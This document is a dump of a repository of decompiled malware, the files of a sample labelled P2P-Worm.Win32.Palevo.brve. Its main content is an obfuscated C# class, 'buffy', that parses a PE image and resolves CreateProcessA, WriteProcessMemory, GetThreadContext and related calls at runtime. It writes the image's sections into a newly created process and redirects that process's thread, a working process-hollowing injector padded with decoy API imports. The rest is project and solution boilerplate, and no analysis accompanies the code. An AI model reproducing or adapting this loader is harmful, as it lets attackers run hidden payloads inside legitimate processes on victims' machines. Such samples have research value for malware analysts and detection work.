IntPtr DASE43E = obj24 != null ? (IntPtr) obj24 : num1;
int dfazdasd = checked ((int) ntHeaders3.OOOU.DFAZDASD);
int dasrdasrasr = (int) ntHeaders3.OOOU.DASRDASRASR;
uint num11 = checked ((uint) (int) w6CtR6Glcc2(DASE43E, dfazdasd, (uint) dasrdasrasr, 12288U, 4U));
if (num11 == 0U)
return;
buffy.ZGOQ8VM05M zgoQ8Vm05M2 = zgoQ8Vm05M1;
object obj25 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_1 = obj25 != null ? (IntPtr) obj25 : num1;
int AL8ZCRFWNU2 = checked ((int) num11);
byte[] DSAE32_1 = DAS4DA3;
int wqdasdasd = checked ((int) ntHeaders3.OOOU.WQDASDASD);
uint num12;
int num13 = checked ((int) num12);
ref int local12 = ref num13;
int num14 = zgoQ8Vm05M2(DASE32_1, AL8ZCRFWNU2, DSAE32_1, wqdasdasd, out local12) ? 1 : 0;
uint num15 = checked ((uint) num13);
long num16 = (long) checked (dosHeader3.DASE3ASDAS + 248);
int num17 = checked ((int) ntHeaders3.DSEEEEE.DAAAAAAAA3 - 1);
int num18 = 0;
while (num18 <= num17)
{
ptr = new IntPtr(checked ((long) integer1 + num16 + (long) (num18 * 40)));
buffy.Section_Header sectionHeader1;
object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
buffy.Section_Header sectionHeader2;
sectionHeader1 = structure2 != null ? (buffy.Section_Header) structure2 : sectionHeader2;
byte[] numArray = new byte[checked ((int) sectionHeader1.DA22S3 + 1)];
int num19 = checked ((int) ((long) sectionHeader1.DA22S3 - 1L));
int index = 0;
while (index <= num19)
{
numArray[index] = DAS4DA3[checked ((int) ((long) sectionHeader1.PoinEEter + (long) index))];
checked { ++index; }
}
buffy.ZGOQ8VM05M zgoQ8Vm05M3 = zgoQ8Vm05M1;
object obj26 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_2 = obj26 != null ? (IntPtr) obj26 : num1;
int AL8ZCRFWNU3 = checked ((int) (num11 + sectionHeader1.AL8ZCRFWNU));
byte[] DSAE32_2 = numArray;
int da22S3 = checked ((int) sectionHeader1.DA22S3);
int num20 = checked ((int) num15);
ref int local13 = ref num20;
int num21 = zgoQ8Vm05M3(DASE32_2, AL8ZCRFWNU3, DSAE32_2, da22S3, out local13) ? 1 : 0;
num15 = checked ((uint) num20);
checked { ++num18; }
}
object bytes = (object) BitConverter.GetBytes(num11);
buffy.ZGOQ8VM05M zgoQ8Vm05M4 = zgoQ8Vm05M1;
object obj27 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_3 = obj27 != null ? (IntPtr) obj27 : num1;
int integer3 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
byte[] DSAE32_3 = (byte[]) bytes;
int num22 = checked ((int) num15);
ref int local14 = ref num22;
int num23 = zgoQ8Vm05M4(DASE32_3, integer3, DSAE32_3, 4, out local14) ? 1 : 0;
num12 = checked ((uint) num22);
NewLateBinding.LateSet(Instance6, (Type) null, "AS4", new object[1]
{
(object) checked (num11 + ntHeaders3.OOOU.DDDDDDDDAAA)
}, (string[]) null, (Type[]) null);
buffy.K7B3INYH01 k7B3InyH01_2 = k7B3InyH01_1;
object obj28 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr ASDASCASDASD = obj28 != null ? (IntPtr) obj28 : num1;
object obj29 = Instance6;
context2 = obj29 != null ? (buffy.Context) obj29 : context1;
ref buffy.Context local15 = ref context2;
int num24 = k7B3InyH01_2(ASDASCASDASD, ref local15) ? 1 : 0;
object obj30 = (object) context2;
buffy.WS2XVBNVO9 ws2XvbnvO9_2 = ws2XvbnvO9_1;
object obj31 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASEAS = obj31 != null ? (IntPtr) obj31 : num1;
int num25 = (int) ws2XvbnvO9_2(DASEAS);
}
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string tr6);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr gdr54, [MarshalAs(UnmanagedType.VBByRefStr)] ref string gfsd54);
[DllImport("rpcns4.dll", EntryPoint = "RpcNsProfileEltAddA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RpcNsProfileEltAdd(
long ProfileNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ProfileName,
ref IntPtr IfId,
long MemberNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string MemberName,
long Priority,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string Annotation);
[DllImport("wldap32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ldap_close_extended_op(ref IntPtr ld, long MessageNumber);
[DllImport("tapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long lineSetAppSpecific(long hCall, long dwAppSpecific);
[DllImport("rtm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MgmGetNextMfeStats(
ref IntPtr pimmStart,
ref long pdwBufferSize,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string pbBuffer,
ref long pdwNumEntries);
[DllImport("mprapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MprAdminDeviceEnum(
ref IntPtr hMprServer,
long dwLevel,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lplpbBuffer,
ref long lpdwTotalEntries);
[DllImport("MSI.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MsiDatabaseImport(
ref IntPtr hDatabase,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFolderPath,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFileName);
[DllImport("rpcrt4.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NdrMesSimpleTypeAlignSize(long handle_t);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetMessageNameDel([MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string msgname);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetReplExportDirSetInfo(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string servername,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string dirname,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string buf,
ref long parm_err);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetUseGetInfo(
ref IntPtr UncServerName,
ref IntPtr UseName,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string bufptr);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long QueueUserWorkItem(long lFunction, ref long Context, long Flags);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleInputA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsoleInput(
long hConsoleInput,
ref IntPtr lpBuffer,
long nLength,
ref long lpNumberOfEventsRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ShowWindowAsync(long hWnd, long nCmdShow);
[DllImport("mgmtapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SnmpMgrCtl(
ref IntPtr session,
long dwCtlCode,
ref long lpvInBuffer,
long cbInBuffer,
ref long lpvOUTBuffer,
long cbOUTBuffer,
ref long lpcbBytesReturned);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long AddAuditAccessAceEx(
IntPtr pAcl,
long dwAceRevision,
long AceFlags,
long dwAccessMask,
ref IntPtr pSid,
long bAuditSuccess,
long bAuditFailure);
[DllImport("ODBCCP32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLInstallerError(
int iError,
ref long pfErrorCode,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszErrorMsg,
int cbErrorMsgMax,
ref int pcbErrorMsg);
[DllImport("msorcl32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLSetCursorName(long hstmt, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szCursor, int cbCursor);
[DllImport("rasapi32.dll", EntryPoint = "RasSetCredentialsA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RasSetCredentials(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
ref IntPtr TLPRASCREDENTIALSA,
long @bool);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsole(
long hConsoleInput,
ref long lpBuffer,
long nNumberOfCharsToRead,
ref long lpNumberOfCharsRead,
ref long lpReserved);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadEncryptedFileRaw(
ref IntPtr pfExportCallback,
ref long pvCallbackContext,
ref long pvContext);
[DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadPrinter(
long hPrinter,
ref long pBuf,
long cdBuf,
ref long pNoBytesRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RegisterHotKey(long hwnd, long id, long fsModifiers, long vk);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReleaseSemaphore(
long hSemaphore,
long lReleaseCount,
ref long lpPreviousCount);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetSiteNameFromSid(ref long pSid, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pwsSite);
[DllImport("kernel32.dll", EntryPoint = "GetStringTypeExA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetStringTypeEx(
long Locale,
long dwInfoType,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSrcStr,
long cchSrc,
ref int lpCharType);
[DllImport("kernel32.dll", EntryPoint = "GetVolumePathNameA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetVolumePathName(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszFileName,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVolumePathName,
long cchBufferLength);
[DllImport("user32.dll", EntryPoint = "SetWindowLongA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SetWindowLong(long hwnd, long nIndex, long dwNewLong);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long TlsSetValue(long dwTlsIndex, ref long lpTlsValue);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr ToAscii(
long uVirtKey,
long uScanCode,
ref byte lpbKeyState,
ref long lpwTransKey,
long fuState);
private static T TXXY5U8D2U<T>(string ASFASE3, string FASGAS543W) => (T) Marshal.GetDelegateForFunctionPointer(buffy.GetProcAddress(buffy.LoadLibraryA(ref ASFASE3), ref FASGAS543W), typeof (T));
public struct Context
{
public uint II69TOHMUR;
public uint d2;
public uint das;
public uint d9;
public uint ad;
public uint dsa;
public uint ds;
public buffy.Save Save;
public uint dh;
public uint sad;
public uint da;
public uint MD;
public uint RD;
public uint mSI;
public uint WDA;
public uint AD3;
public uint D21;
public uint AS4;
public uint K32;
public uint F2W;
public uint HHJ;
public uint ADF5;
public uint GSSA;
public uint DSAAA;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] er6rgdr65;
}
public struct Save
{
public uint KD7JX2MXT;
public uint JCNS3ZPSXO;
public uint DAS3;
public uint DAS23;
public uint ADSA;
public uint DAF35;
public uint FA32D;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] FSDRF43;
public uint FA32QA;
}
public struct Misc
{
public uint SDUHRL;
public uint GSIJ;
}
public struct Section_Header
{
public byte FSDPOU4PO3;
public buffy.Misc Mi2sc;
public uint AL8ZCRFWNU;
public uint DA22S3;
public uint PoinEEter;
public uint E2Q4RS;
public uint FS523QF;
public uint FSB43FSD4;
public uint QBFAS4E;
public uint AS32QFZS;
}
public struct Process_Information
{
public IntPtr DAS4QQW;
public IntPtr RFSER;
public int TGJWE;
public int SDFFFFFFFFFF;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct Startup_Information
{
public int CSZE;
public string FSDR4G;
public string AAAAAAAAAA;
public string AADDDDDDD;
public int ADA;
public int C;
public int AEDS;
public int DASDDDD;
public int XASE4;
public int DAS3EDFZ;
public int DVA3ES;
public int CCCCQ;
public short FDSRS;
public short VYE5X;
public int KHJKIHJK;
public int KHJKHJK;
public int KHJKHJ;
public int KHJKJHK;
}
public struct Security_Flags
{
public int GFSETWE;
public IntPtr EWEWWW;
public int DASDAS;
}
public struct DOS_Header
{
public ushort DASDASFASF;
public ushort QWEQWE;
public ushort EQWEQWEQWE;
public ushort HFGHFGHFGH;
public ushort HFGHFGHFG;
public ushort DASD444444;
public ushort DASFASE33;
public ushort DASKGHJ;
public ushort DASVZDF;
public ushort VXCVXC;
public ushort VXCVXCV;
public ushort EWECS;
public ushort EWADC;
public ushort UADA3;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] ReservWWWWWWWWWWWWWWWedA;
public ushort DAS4E;
public ushort UJJ;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] DDDDDDDDD;
public int DASE3ASDAS;
}
public struct NT_Headers
{
public uint SSSSSSSSSSSQ;
public buffy.File_Header DSEEEEE;
public buffy.Optional_Headers OOOU;
}
public struct File_Header
{
public ushort ITTTTTTTT;
public ushort DAAAAAAAA3;
public uint HRFTYTYTR;
public uint GJGFSFS;
public uint FSVGY;
public ushort FSFV;
public ushort A34FFC;
}
public struct Optional_Headers
{
public ushort WWWWWWWWW;
public byte MaAAAAAAAAAAAjor;
public byte MiSSSSSSSSSSSnor;
public uint SSSSSSSSSSSSS;
public uint FFFFFFFFFFF;
public uint XXXXXXXX;
public uint DDDDDDDDAAA;
public uint FSSSSSSS;
public uint RSFS43;
public uint DFAZDASD;
public uint SectionA;
public uint FileA;
public ushort GDFTDFFFF;
public ushort HGDFHD564;
public ushort GD5ERGD;
public ushort FSD5YHD;
public ushort ASDASG;
public ushort AS4ASAS;
public uint CCC;
public uint DASRDASRASR;
public uint WQDASDASD;
public uint Assssssss;
public ushort fsd4s;
public ushort fjio;
public uint dasrlajstpoi;
public uint dasdraskyjhuasp;
public uint SHRedas4wa9uqserve;
public uint fsdtsysyt;
public uint eawdasdas3;
public uint Cocccunt;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public buffy.Data_Directory[] GSDGSDT4;
}
public struct Data_Directory
{
public uint ewq34q234;
public uint das34aw33;
}
public delegate bool GN04L0ER8I(
string ASFASE3,
string DASDAS3E2,
ref buffy.Security_Flags DASCASE,
ref buffy.Security_Flags CASE222,
bool DAS432E,
uint AEDFKJK32,
IntPtr DSA43R3W,
string ase32ew,
[In] ref buffy.Startup_Information das43fsa,
out buffy.Process_Information das3);
public delegate bool ZGOQ8VM05M(
IntPtr DASE32,
int AL8ZCRFWNU,
byte[] DSAE32,
int DASEADAS,
out int ASD43FA);
public delegate int Q7QRRP639W(
IntPtr FASFDASDAS,
int AL8ZCRFWNU,
ref int CAS32,
int ASDASC,
ref int CASTWE);
public delegate IntPtr W6CTR6GLCC(
IntPtr DASE43E,
int AL8ZCRFWNU,
uint DASCAS3,
uint DAS3,
uint DAS32);
public delegate long EFVI2YI66B(IntPtr DASE3, int AL8ZCRFWNU);
public delegate uint WS2XVBNVO9(IntPtr DASEAS);
public delegate bool R84OY4NT36(IntPtr DASDASC, ref buffy.Context DSACSA43);
public delegate bool K7B3INYH01(IntPtr ASDASCASDASD, ref buffy.Context ASCA434);
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-585366f7ae243e62a03579e6a5c5327ca5da4ab8e55385b08a9601962c106afa/pizde.cs
+645
View File
File diff suppressed because one or more lines are too long
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/MyApplication.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ApplicationBase
{
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/MyProject.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
[HideModuleName]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/P2P-Worm.Win32.Palevo.brve.csproj
+46
View File
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9F4D5823-B0B6-4011-9309-6008EBD4A806}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>66666</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>My</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="pizde.cs" />
<Compile Include="buffy.cs" />
<Compile Include="MyApplication.cs" />
<Compile Include="MyComputer.cs" />
<Compile Include="MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/P2P-Worm.Win32.Palevo.brve.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "66666", "P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.csproj", "{9F4D5823-B0B6-4011-9309-6008EBD4A806}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9F4D5823-B0B6-4011-9309-6008EBD4A806}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/buffy.cs
+632
View File
@@ -0,0 +1,632 @@
// Decompiled with JetBrains decompiler
// Type: buffy
// Assembly: 66666, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2453255D-06D9-4B55-8A59-D5B108E7DFD5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
public class buffy
{
public const long ASDFASFASF = 2778;
public const long FASFASFASF = 60116;
public const long AFSFASFASCFC = 218;
public const long ASDASCASDASD = 218;
public const long BVCXBXCBXCB = 218;
public const long BXCBXCBXCB = 253;
public const long FSDR3FSF = 218;
public const long KKKKKKKKKDDDDDDD = 17247;
public const uint FSSSSSSSSSSSSSSSSSS = 218;
public static void mickey(byte[] DAS4DA3, string VVVVVVCAE)
{
object Instance1 = (object) new buffy.Context();
object obj1 = (object) new buffy.Process_Information();
object obj2 = (object) new buffy.Startup_Information();
object obj3 = (object) new buffy.Security_Flags();
object obj4 = (object) new buffy.Security_Flags();
object Instance2 = (object) GCHandle.Alloc((object) DAS4DA3, GCHandleType.Pinned);
int integer1 = Conversions.ToInteger(NewLateBinding.LateGet(NewLateBinding.LateGet(Instance2, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (Type) null, "ToInt32", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
buffy.DOS_Header dosHeader1 = new buffy.DOS_Header();
Type Type = typeof (Marshal);
object[] objArray1 = new object[2];
object[] objArray2 = objArray1;
object Instance3 = Instance2;
object objectValue = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(Instance3, (Type) null, "AddrOfPinnedObject", new object[0], (string[]) null, (Type[]) null, (bool[]) null));
objArray2[0] = objectValue;
objArray1[1] = (object) dosHeader1.GetType();
object[] objArray3 = objArray1;
object[] Arguments = objArray3;
bool[] flagArray = new bool[2]{ true, false };
bool[] CopyBack = flagArray;
object obj5 = NewLateBinding.LateGet((object) null, Type, "PtrToStructure", Arguments, (string[]) null, (Type[]) null, CopyBack);
if (flagArray[0])
NewLateBinding.LateSetComplex(Instance3, (Type) null, "AddrOfPinnedObject", new object[1]
{
RuntimeHelpers.GetObjectValue(objArray3[0])
}, (string[]) null, (Type[]) null, true, false);
buffy.DOS_Header dosHeader2;
buffy.DOS_Header dosHeader3 = obj5 != null ? (buffy.DOS_Header) obj5 : dosHeader2;
NewLateBinding.LateCall(Instance2, (Type) null, "Free", new object[0], (string[]) null, (Type[]) null, (bool[]) null, true);
buffy.GN04L0ER8I gn04L0Er8I1 = buffy.TXXY5U8D2U<buffy.GN04L0ER8I>("kernel32", "CreateProcessA");
buffy.R84OY4NT36 r84Oy4Nt36_1 = buffy.TXXY5U8D2U<buffy.R84OY4NT36>("kernel32", "GetThreadContext");
buffy.Q7QRRP639W q7QrrP639W1 = buffy.TXXY5U8D2U<buffy.Q7QRRP639W>("kernel32", "ReadProcessMemory");
buffy.ZGOQ8VM05M zgoQ8Vm05M1 = buffy.TXXY5U8D2U<buffy.ZGOQ8VM05M>("kernel32", "WriteProcessMemory");
